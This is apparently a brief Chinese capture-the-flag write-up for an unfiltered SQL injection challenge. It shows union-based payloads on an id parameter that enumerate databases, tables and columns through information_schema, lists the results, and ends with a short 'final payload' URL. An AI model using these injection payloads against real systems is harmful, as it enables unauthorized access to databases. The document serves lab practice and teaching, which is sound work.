送分的sqli
这题没有任何过滤什么的,真的是很简单了。
1 and 1=-1 union select 1,schema_name from information_schema.schemata
查看库名,得:
1 information_schema
1 test
1 week3_sqliiii2
?id=1 and 1=-1 union select 1,table_name from information_schema.tables
查表,得:
。。。
1 test
1 f111aa4g
1 users
猜测在f111aa4g里:
查列名
?id=1 and 1=-1 union select 1,column_name from information_schema.columns
1 f111aaaggg_w3
1 username
猜测在f111aaaggg_w3里。
最后payload:
http://118.25.18.223:10068/?id=-1